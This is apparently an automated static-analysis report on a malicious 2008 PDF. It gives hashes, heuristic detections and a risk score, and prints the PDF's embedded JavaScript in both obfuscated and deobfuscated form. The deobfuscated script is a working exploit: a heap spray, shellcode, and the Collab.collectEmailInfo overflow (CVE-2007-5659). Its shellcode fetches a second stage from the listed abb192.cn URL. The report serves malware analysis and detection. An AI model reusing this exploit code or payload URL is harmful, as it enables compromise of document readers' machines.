Malicious PDF — malware analysis report

Static analysis result for SHA-256 aebff3feca949e42…

MALICIOUS

PDF

4.7 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 49d9f67901e82236efea8ea5920a46ab SHA-1: aec5224a3cb64ab3d45bd7f1f20a71f807392916 SHA-256: aebff3feca949e4212da913e31f538a69828d74f285ca182d9d6a8147ab92039
308 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript with multiple heuristic firings indicating obfuscation and eval() calls. The embedded JavaScript is likely designed to download and execute a second-stage payload. The obfuscated nature of the script prevents a more detailed analysis of its specific actions.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function pA7Si9y(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function tIkH661u(U1yVu){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(U1yVu)"+";"+"}");eval("function zjnKtBtp(JAIngSR7){var TjNMdU="+"0,rcB3C=JAIngSR7.l"+"en"+"gth,zx7LQLAm6y7y0=10"+"2"+"4,N9JyR7ftXl5ZO,ha6UYCqyY1k,qrb0qPIANjG3dn='',qMDxxn4SMGIK=TjNMdU,Y5SIv4Sm=TjNMdU,owqTDt71ioNv=TjNMdU,vjpn666P=Ar"+"ra"+"y(63,51,19,31,45,13,27,32,14,24,0,0, …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://abb192.cn/exp/load.php?id=7856&spl=4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x365 6429 bytes
SHA-256: 6c44f45553e2b3fbb8c4c853e505c561042e4f8f5b5069790dde02832074bdd9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 124 of 229 identifiers look randomly generated (e.g. 'jW3suaVqNW3hja8KIW3sut8KuW3hNUwNjW3hNU'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function pA7Si9y(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function tIkH661u(U1yVu){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(U1yVu)"+";"+"}");eval("function zjnKtBtp(JAIngSR7){var TjNMdU="+"0,rcB3C=JAIngSR7.l"+"en"+"gth,zx7LQLAm6y7y0=10"+"2"+"4,N9JyR7ftXl5ZO,ha6UYCqyY1k,qrb0qPIANjG3dn='',qMDxxn4SMGIK=TjNMdU,Y5SIv4Sm=TjNMdU,owqTDt71ioNv=TjNMdU,vjpn666P=Ar"+"ra"+"y(63,51,19,31,45,13,27,32,14,24,0,0,0,0,0,0,34,39,61,47,33,18,30,37,16,58,52,46,28,8,57,26,60,48,21,29,54,38,6,55,0,40,17,0,0,0,0,23,0,22,7,15,50,41,9,53,10,43,36,4,25,5,44,12,2,62,35,42,20,56,49,3,11,59,1);f"+"o"+"r(ha6UYCqyY1k=M"+"at"+"h.c"+"ei"+"l(rcB3C/"+"zx7LQLAm6y7y0)"+";ha6UYCqyY1k>TjNMdU;ha6UYCqyY1k-"+"-){fo"+"r(N9JyR7ftXl5ZO=Ma"+"th.m"+"in(rcB3C,zx7LQLAm6y7y0);N9JyR7ftXl5ZO>TjNMdU;N9JyR7ftXl5ZO-"+"-,rcB3C-"+"-){owqTDt71ioNv|"+"=(vjpn666P[JAIngSR7.cha"+"rCod"+"eAt(qMDxxn4SMGIK+"+"+)-48])<"+"<Y5SIv4Sm;if(Y5SIv4Sm){qrb0qPIANjG3dn+"+"=tIkH661u"+"(210^owqTDt71ioNv&"+"2"+"5"+"5);owqTDt71ioNv>"+">="+"8;Y5SIv4Sm-"+"="+"2;}el"+"se{Y5SIv4Sm="+"6"+";}}"+"}return (qrb0qPIANjG3dn);}var vUMhQPACs=implode('',['d2','In','7hc','ULa','Nss','6','f','CO','8ljP','h0','yd1y4Gh0j7pInis','0qex','c4Ad6','nUK6','C','Ph0AD0','euZ','O','I','AG','puNx','@','iqLVe','sP8lKz','KM','uwE','i0dxssp89K1s','qqdAsPGsyKqFiPI1ljsdyjNVu','@7cM4Pyy4','PaieI@cuK','x','ssp89K1sqqedljs','dyjNVu@7cM4dA0yd1ljsdyjNVu@7','cM4e','0sPLVesP8lK','z','KMu','wEiP','Cxc','AZsh','C','2','U','67xp','q7J','d3Y','Ap','6Y','Up','IKPaiq@yCYs','hu7N8iI','Bwq','qexcYWOIe7diPLVesP8lKzK','MuwE6','I','d0sPJF','hCvOIKBdiPisNurO6e6KxDDiIj_Fsqy','x3sd2In7hc4','J8usI8I4GFKPCxCushFn@biu','vhFnexce1psP','6FuAspyjUOsP','Cx0ePF','6Yv8i','YWscP','W3sN','D6','FuW3sND','6FuW3sND6FuW3su','tFfjW3Ou','D','38j','W3hNjbNI','W3','sI@','wNIW3','sI@','xquW3IGtVF','uW','3IG76FuW3IGHE','NjW3IGsxqNW','3hGtFljW3hGtE','fGW3sIHa8GW3s','GtOqGW3IG','tFfGW3hN','U3fGW3IGD','cfGW3IItEKN','W3','sN72luW','3IItEKNW3hN_FlNW3','I','GthF','uW3IGtFfjW3hNU3fGW','3hjixFu','W','3hNri','FNW3IGrc','NuW3su','G','x','FuW','3','IGt','8quW3','IGtFfGW3Ij','2E8','NW3hji3','fjW3ONGiFNW3hNAcq','uW3','suG','3N','uW3IGt88GW3I','G','tFf','GW3','Ij2E8NW3hj','i3lN','W3O','j','2sFNW3Iu@38GW3','s','uGwKGW3','IGthKGW3','IGtF','fGW3Ij2E8','N','W3h','ji3luW3su@iFNW3','sutpquW','3suGi8GW','3IG','tV8','jW3IGtFfGW3Ij2E8','NW3hj','i','2fGW3hu_','sF','N','W3su2K8N','W','3suG3FNW3I','Gtpq','I','W3IGtFf','GW3Ij2E8NW3IjtEfjW','3','sGG','28GW3II2p','FjW','3hNjcq','N','W3hGGc','NjW3IGsx8NW3IGtFNGW3hjr3fGW3II2E8NW','3h','NUbfjW3IGH8NjW3IG_sqNW3h','NUwfN','W3hG','Gw','NjW3','suGw','NIW','3IGtE','KNW3I','GtFfG','W3sI','GwfGW3hGA6NIW3IItV','euW','3ONsxF','NW3IGtFfGW3hNj3','f','GW','3hGDc','Nj','W3h','u2EK','NW3hutE','FjW3hNjwfGW3Ojt8NjW3','Iu@iFN','W3IGtFfGW','3hjtFfGW','3','Ij2EKNW3sIA2fjW3hjj','3eGW3','hj2EKNW3s','uG','2','lN','W3IGtsqGW3I','GtFfGW3Ij','2FljW3h','usbfGW3hj','D3fGW','3OjrCquW3h','usiqjW3IGH8fGW3sI2','KF','NW3IGt','FfGW','3II28Ku','W3hNUbfGW3IGDc','NjW3I','G_sq','NW3hNUwfNW3hG','GwNjW3Ij','th','FNW','3IGtFfGW3sIA3fG','W3hjG3eIW3Ij2F','lj','W','3','sGZVfj','W3h','jZVKNW3','Iu@','wljW3OjtKqjW','3','hjZpfGW3Ij2EKNW3s','I','A2l','uW3hjj3Nj','W3hj2EKNW3suG2lNW3IGtVljW3IGtF','fGW','3IGtsqN','W3II2','8Ku','W3hNUbf','G','W3','IGGcNjW3I','GasqNW3hNUwfNW3h','GGwNj','W3','h','G','t','hFNW3IGtFfGW3','s','IA3f','G','W3hNUcKuW3','hG','t8N','jW3','IG_sqNW3hN','UwfNW3hGGwNjW3IGth','FNW3IGtFfGW3Ij_FfGW3h','jap','eNW','3su','_Fl','jW3su_FljW3','su_','FljW3su_','FljW3suD2FjW3hjA3fjW3hN','U','wl','jW3suaVqNW3hja8KIW3sut8KuW3hNUwNjW3hNU','xFu','W3','IGGC8u','W3','hj72KNW','3hji3luW3II','ZEKNW','3hNU6l','uW','3','hG','rC8jW','3I','GZ','KFNW3hj','icFjW3I','Ii2KNW3IGZVf','GW','3sGZ8FjW3Ijjw8NW3sN7','cNGW','3huZFlj','W3sGZ','pNIW3I','G@cq','IW3hGt','F','quW3IuaONNW3IGGC','8j','W3hurw','qG','W3I','G','ZFfuW3Ijt8KGW3Iu','_h','KNW3Iur6eNW3','II2','pNuW3hjAxqj','W3','suU2KNW3','hjA','2KNW3I','GZVfjW3sIib8uW3IGD2KNW','3hNUce','NW3hGDwNNW3O','u73','ljW3IG','HEKN','W3IGZEK','NW3','hj','rwqjW3huapf','uW3I','GtFlNW3Iu','HhFNW3','Iu@cquW3hj28KuW3IjD','weGW3Ij@','cfuW3IGt8N','uW3O','NU2KIW3ON@','_KNW','3hutVqjW3','hNrw','8GW','3h','N728uW3','OuibquW3hu_V8uW3hN_EFuW3hNAw8GW3ON@_KI','W3hNZp8GW3hN','r28GW3hu_EKNW','3hNs','_','KuW3','Outa','KuW3','hN','U','2qIW','3Ou','G','bKGW3','OuAbKIW3hujb8NW3','ON@_Fu','W3OuaE','FjW3s','u@bKNQC3Id2In7h0C2','K','iDr','0e7ACICxIePCxC','usOKu@x','Ku@A','KPj8xYd2xD','T','F8','4Lh','0y','dC','ND3shn','2OseP','yy4P','a','i','eIhcqdwFId2In7hCYsh','u7N','8iId0KP08','NKV','8qApF','qs0KYAd','0CPI2xDTF8','4LU','CusV','KIy','AKPj8xYd1l','j','sdyjNVu@','7c','M','4d0KPAdy4D','Vy','n@FiqQ30eixqI@30eixq','I','@w0qexc','AZ','shC2U6','7xpq7J','h0y','d0','lu3h','FjUqleXFq@uscAZshC2U6','7xpq7JICP','@ss7wUynsC','3Id2In7h0Gw8OAk','Oqj','@8NeMasPC','x','CqJEy7isyYW','aI','Nd0CP@i','sN','@xK','u','@xqqB0yjyOuu','3','hu','Niqy@','F','UKPJTx','Yd','ice1p','sP0','s9ND2fnjbNC9aFK','Cx','F','I','0s9ND2fnjbN','C','9aFK','K3N','7r','TfD','UceY','2Fh@GUq','Ch','aFu','tpxNZqxUGA','6qNCC','Pehc','ULaNss','6fCO','8','ljP','UuC','ha','Futp','xNZqxUGAyrd0','KPLVesP','8lKzKMuwEi','P','Nx0UbqesQ','8eeUUKPC','h0id2y','ePVieyTx','Cd_i','7j3iY@biqyx3sd2I','n7hc','DiIeeV','@s','s@1f','@GdiP','Cx','0n@','hh0jKy','4GFxYkF','xYDK6','C','P','dCeBVYe7KxCgs0qexcDiIeeV@','ss@1f','@','GdiP','Cx','cD','i','Ie','eV@s','s@1','f@','Gdx07FiYq8','6nWs308','Ol','0gIc','PQ','C3Id2','In7h','049OMD@3y7yh0y','d1y4Gh0j','7p','In','iscD','iIeeV@ss@1f@Gdx0','v','syn78eeIxq','q','q2','usFO','sDYs','s','uL@9e','Pd3nI8xY2OsqrCC','0kKs','AUOMss','h8AMahCPbi','K1pIjUs','cuyC3','IdCx4diCqW@eDkh','q4w','K6@@0YP','C0','KPs','xcBJxCqI3x','UV','EYuW8','uKf8qrd0qyd','c','KPJ2CPW@','eDkhq4','wK6','@','70YPKxcuyxC','iKh0','49OM','D@3y7y','Uuuch','C','y','dc','qqyxCiKh','Cq','W@eDkhq4wK6@@0YPC0K','PG','xcBJx049','OMD@3y7y','UuuchC','ydcqqdysidi049OMD@3','y7','yUYuch','Cyd','_qqyx3sdCsUrcs4GKNKkVK','s2F','NeIC3Id2In7h0','A','rcqnW8O','KOVYDd0KPAdy','4DVyn@Fi','qQ30e@bi','uvF0e','@','biu','v','p0qex3eIKiC','Ws0Arcqn','W8','OKOVYDPyy','4P','a','i','eI','hCyd','6K','Ni3','8u','yx0ArcqnW8OKOVYD','dA0yd0N','ur','cy4rU','i','UzO9I','d6sKy','Vh0','vTiCq8xnz','OOC7FiPCx3','jB','IiC1p','x0v','TiCq','F6nU','F','NC1','KiC6dx4Bs3','s','DFh','n','u','@KPQwC00VO4Y','x0ArcqnW8','OKOV','YDC','K3Id','0sPCh','34','p','Eq4@hFnIC3I']);");eval(zjnKtBtp(vUMhQPACs));}
generic_stage_recovery_000.js deobfuscated-js generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x365 2619 bytes
SHA-256: e69caf21e7aea0db81c30c597d1c3cc486c8bc82847270a0df69e16ad577eefb
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var JNGy8DnHACn = new Array(); function M3M0CtMwR5Yj(NCxnAkSY2Qf, pxPQka8) { while (NCxnAkSY2Qf.length*2<pxPQka8){NCxnAkSY2Qf += NCxnAkSY2Qf;} NCxnAkSY2Qf = NCxnAkSY2Qf.substring(0,pxPQka8/2); return NCxnAkSY2Qf; } function yH1qdwIiV3xAEu() { var ffQyhqew5 = 0x0c0c0c0c; var IUMxbAtt = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u652F%u7078%u6C2F%u616F%u2E64%u6870%u3F70%u6469%u373D%u3538%u2636%u7073%u3D6C%u0034"); var mAiT1MP5ymYL = 0x400000; var fVd5fN = IUMxbAtt.length * 2; var pxPQka8 = mAiT1MP5ymYL - (fVd5fN+0x38); var NCxnAkSY2Qf = unescape("%u9090%u9090"); NCxnAkSY2Qf = M3M0CtMwR5Yj(NCxnAkSY2Qf, pxPQka8); var EQqOV4ApAuZw = (ffQyhqew5 - 0x400000)/mAiT1MP5ymYL; for (var mX73Fb6CmJ7k=0;mX73Fb6CmJ7k<EQqOV4ApAuZw;mX73Fb6CmJ7k++) { JNGy8DnHACn[mX73Fb6CmJ7k] = NCxnAkSY2Qf + IUMxbAtt; } } function gP6ep0c() { var VyLtTzx0NZwn = app.viewerVersion.toString(); VyLtTzx0NZwn = VyLtTzx0NZwn.replace(/\D/g,""); var eJTV0eQi = new Array(VyLtTzx0NZwn.charAt(0),VyLtTzx0NZwn.charAt(1),VyLtTzx0NZwn.charAt(2)); if ((eJTV0eQi[0] == 8 && ((eJTV0eQi[1] == 1 && eJTV0eQi[2] < 2) || eJTV0eQi[1] < 1)) || (eJTV0eQi[0] == 7 && eJTV0eQi[1] < 1) || (eJTV0eQi[0] < 7)) { yH1qdwIiV3xAEu(); var M11aeqkHST = unescape("%u0c0c%u0c0c"); while(M11aeqkHST.length < 44952) M11aeqkHST += M11aeqkHST; this.collabStore = Collab.collectEmailInfo({subj: "",msg: M11aeqkHST}); } } gP6ep0c();

Open this report in the interactive analyzer, or submit your own file for analysis.